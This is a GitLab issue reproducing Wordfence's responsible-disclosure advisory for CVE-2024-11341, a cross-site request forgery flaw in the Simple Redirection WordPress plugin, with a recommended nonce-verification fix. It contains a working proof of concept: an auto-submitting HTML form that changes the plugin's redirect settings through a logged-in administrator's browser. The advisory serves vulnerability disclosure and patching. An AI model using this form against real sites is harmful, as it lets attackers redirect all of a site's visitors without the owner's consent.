Skip to content
GitLab
Closed
Issue created by Bastien Ho@bastienho👽Owner

Cross-Site Request Forgery to Arbitrary Site Redirect

​Hello,

We have a new vulnerability in the Simple Redirection plugin to responsibly disclose to you, and the details are outlined below.

Please note that this issue was discovered and responsibly reported to us by SOPROBRO. Any credit for the discovery of the vulnerability should be granted to them.

  • Vulnerability Title: Simple Redirection <= 1.5 - Cross-Site Request Forgery to Arbitrary Site Redirect
  • CVE ID: CVE-2024-11341
  • CVSS Severity Score: 4.3 (Medium)
  • CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
  • Organization: Wordfence
  • Vulnerability Researcher(s): SOPROBRO
  • Software Link(s): https://wordpress.org/plugins/eelv-redirection

Description

The Simple Redirection plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the settings_page() function. This makes it possible for unauthenticated attackers to update the plugin's settings and redirect all site visitors via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

Proof of Concept

Make a logged in admin click a link with the following HTML (replace the domain)

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Auto-Submitting Form</title>
<script>
document.addEventListener('DOMContentLoaded', function() {
var form = document.getElementById('autoForm');
if (form) {
// Check if requestSubmit is available, otherwise fallback to submit
if (typeof form.requestSubmit === 'function') {
setTimeout(() => form.requestSubmit(), 500); // Delay for clarity
} else {
setTimeout(() => form.submit(), 500);
}
}
});
</script>
</head>
<body>
<form id="autoForm" action="http://{domain}/wp-admin/options-general.php?page=eelv_redirection" method="POST">
<input type="hidden" name="eelv_when_redirect" value='0' />
<input type="hidden" name="eelv_code_redirect" value='302' />
<input type="hidden" name="eelv_url_redirect" value='http://google.com' />
<input type="hidden" name="submit" value='Save Changes' />
<input type="hidden" name="Submit" value="Submit" />
</form>
</body>
</html>

Any Known Public References

https://plugins.trac.wordpress.org/browser/eelv-redirection/trunk/eelv_redirection.php#L85

Recommended Solution

We recommend adding nonce verification to any functions that perform operations to modify data (such as settings) and require the user initiating the request to be authorized to make that request. You may use a nonce verification function such as wp_verify_nonce(), check_ajax_referer(), or check_admin_referer(). More information about nonce protection can be found at: https://developer.wordpress.org/apis/security/nonces/

As per our standard disclosure process, we may notify our customers and the general public about this vulnerability according to the timeline outlined here: https://www.wordfence.com/security/. We may confidentially notify interested parties both inside and outside our organization before the announcement date. To avoid an accelerated disclosure timeline, please acknowledge receipt of this report within 14 days.

You should be aware that other researchers may independently discover this vulnerability and announce it prematurely. You should also note that this vulnerability may be exploited in the wild already. For these reasons we encourage you to release a fix as soon as possible to help protect your customers.

As a courtesy we ask that you notify us as soon as you release a fix to your customers. Please let me know if you have any questions.